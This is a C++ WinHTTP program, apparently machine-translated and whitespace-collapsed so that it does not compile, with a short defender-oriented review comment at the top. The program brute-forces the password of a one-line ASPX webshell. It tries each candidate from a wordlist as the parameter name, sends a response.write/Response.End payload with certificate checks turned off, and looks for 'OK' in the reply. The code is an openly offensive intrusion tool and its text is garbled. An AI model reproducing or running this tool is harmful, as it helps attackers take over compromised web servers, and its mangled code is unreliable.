/*
 * NOTE(review): this listing is a machine-translated, whitespace-collapsed
 * paste. Identifier case is mangled, tokens are split or fused, and the
 * original line comments now swallow the code that follows them on the same
 * physical line, so it does not compile as shown. The code is reproduced
 * exactly as published.
 *
 * What the visible code does: it reads candidate strings, one per line, from
 * the file named by argv[3]. For each candidate it opens a WinHTTP session,
 * connects to the host in argv[1] on the default HTTPS port and sends a GET
 * for the path in argv[2]. The candidate is used as the query-parameter name
 * and a fixed response.write(...) / Response.End() snippet as its value.
 * The response body is then searched with strstr for "OK" and the result is
 * printed per line.
 *
 * Defender notes, taken only from the literals and calls below:
 *  - The agent string passed to WinHttpOpen is "HttpClient 1.0".
 *  - Every attempt is a GET whose query string carries "response.write" and
 *    "Response.End"; a run of such requests against one path, each with a
 *    different parameter name, is the pattern to look for in web-server and
 *    WAF logs.
 *  - The four SECURITY_FLAG_IGNORE_* values set through WinHttpSetOption
 *    disable certificate validation (unknown CA, expiry date, common name,
 *    usage), so a certificate error on the target does not stop the client.
 *  - Presumably the target is a page that evaluates a request parameter as
 *    server-side script. Confirm against the affected host; locating and
 *    removing such a page is the remediation, not rate-limiting alone.
 */
#include "stdafx.h" #include <stdio.h> #include <Windows.h> #include <stdlib.h> #include <string.h > #include <string> #include <winhttp.h> #pragma comment (lib, "Winhttp.lib") void banner ()//Display banner{ printf ("[-]:webshell Aspx crack T00ls\r\n[-]:welcome www.90sec.org\r\n");} int _tmain (int argc, _TCHAR * argv []) {DWORD dwsize = 0; LPSTR Pszoutbuffer; Lpbyte Lpheader, lpdata; LPCWSTR Host = argv[1]; LPCWSTR URL = Argv[2];char Buf[max_path] = {0}; Fgets Receive string file* fp;int i = 0;if (argc < 4)//if inlet length is less than 4{banner ();p rintf ("[-]:%s Host domain_url password_list\r\n", AR Gv[0]); return 0;} if (fp = _wfopen (argv[3],l "RB") = = NULL)//Open the file if it does not exist {printf ("File not found\r\n");//Print error return 0;} while ((Fgets (BUF,MAX_PATH,FP)))///note here, Fgets reads the file, the default line end will add a carriage return, I just stuck here all night {Buf[strlen (BUF)-2] = ' + '; That is, enter, replace hinternet hinternet = WinHttpOpen (L "HttpClient 1.0",//define Access Sessionswinhttp_access_type_default_proxy, winhttp_no_proxy_name,winhttp_no_proxy_bypass,0); if (hinternet = = NULL)//If the defined access sessions is empty {printf ("Failed to Initialize http sessions\r\n"); return 0;} Hinternet hconnect = Winhttpconnect (hinternet,//Initialize connection host,//define address internet_default_https_port,//default port 4430); if ( Hconnect = = null)//If empty, close WinHTTP handle {printf ("hconnect error\r\n"); Winhttpclosehandle (hinternet); return 0;} wchar* res = new Wchar[max_path + 1]; Frees memory, prepares to write data wsprintf (res,l "%s?%s=response.write (\" Ok\ "); Response.End () ", url,buf); Write the string into the variable that frees the memory hinternet hrequest = Winhttpopenrequest (hconnect,//Prepare the transfer, define a good format L "GET", res,l "http/1.1", Winhttp_no_ referer,winhttp_default_accept_types,winhttp_flag_secure| Winhttp_flag_refresh); if (hrequest = = NULL) 
{winhttpclosehandle (hinternet); Winhttpclosehandle (hconnect); return 0;} DWORD Dwflags;dword dwbufflen = sizeof (dwFlags); Winhttpqueryoption (hrequest, Winhttp_option_security_flags,//Set query Options (LPVOID) &dwflags, &dwbufflen);d wflags |= security_flag_ignore_unknown_ca;dwflags |= security_flag_ignore_cert_date_invalid;dwflags |= SECURITY_FLAG_IGNORe_cert_cn_invalid;dwflags |= Security_flag_ignore_cert_wrong_usage; WinHttpSetOption (hrequest, Winhttp_option_security_flags,//SET options &dwflags, sizeof (dwFlags)); WinHttpSendRequest (hrequest,//Send data winhttp_no_additional_headers,0,winhttp_no_request_data,0,0,0) = = FALSE) {DWORD Err = GetLastError (); Winhttpclosehandle (hrequest); Winhttpclosehandle (Hconnect); Winhttpclosehandle (hinternet); return 0;} if (Winhttpreceiveresponse (hrequest,null) = = FALSE)//start reading corresponding {DWORD err = GetLastError (); Winhttpclosehandle (hrequest); Winhttpclosehandle (Hconnect); Winhttpclosehandle (hinternet); return 0;} DWORD dwsize = 0;if (! Winhttpquerydataavailable (hrequest, &dwsize))//Check if there is still data to accept printf ("Error%u in winhttpquerydataavailable.\n", GetLastError ()); WinHttpQueryHeaders (hrequest,//View HTTP response header winhttp_query_raw_headers_crlf,winhttp_header_name_by_index,null,& Dwsize,winhttp_no_header_index); Lpheader = (LPBYTE) HeapAlloc (GetProcessHeap (), 0, dwsize); WinHttpQueryHeaders (Hrequest, Winhttp_query_raw_headers_cRLF, Winhttp_header_name_by_index, Lpheader, &dwsize, Winhttp_no_header_index); HeapFree (GetProcessHeap (), 0, Lpheader);D word dwdownloaded = 0;pszoutbuffer = new Char[dwsize+1];if (!pszoutbuffer) { printf ("Out of memory\n");} ZeroMemory (Pszoutbuffer, dwsize+1); if (! 
WinHttpReadData (Hrequest, (LPVOID) Pszoutbuffer, dwsize, &dwdownloaded)) {printf ("Er Ror%u in winhttpreaddata.\n ", GetLastError ());} if (Strstr (Pszoutbuffer, "OK")) {printf ("Line:%d-->find password success:%s\n", ++i,buf); return 0;} else{printf ("Line:%d-->password not found:%s\n", ++i,buf);}} Delete[] pszoutbuffer;//delete[] Res;return 0;}
Go ASPX one-line webshell password brute-force tool